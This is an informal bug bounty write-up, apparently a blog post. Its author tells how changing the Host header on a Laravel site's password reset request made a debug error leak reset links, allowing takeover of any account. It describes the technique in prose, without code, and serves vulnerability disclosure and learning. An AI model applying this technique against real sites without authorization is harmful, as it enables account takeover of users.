hey folks
before 1 month ago i i was hunting on a private bug bounty program on bugcrowd so i will call it (redacted), as usual while doing recon a subdomaine catched my attention , once i visited the subdomaine laravel word in wappalyzer let me think about Debug mode in laravel frameworks …
first i thinked about what to do to force that debug mode to appear !
i fired my burp and start abusing requests , after a little time i thinked about manipulating the host header with another host and yeah nothing happened but i’ve redirected to my host ! an idea fired fastly in my head !
i said to myself what if i changed the host header on reset password functionality ! maybe i can manipuate the reset password link ! and whats happened was wow ! not expected !
when i changed the host header the laravel error disclosed the reset password link that should be sent to me or anyone !
now i can reset the password of any user !
cheers
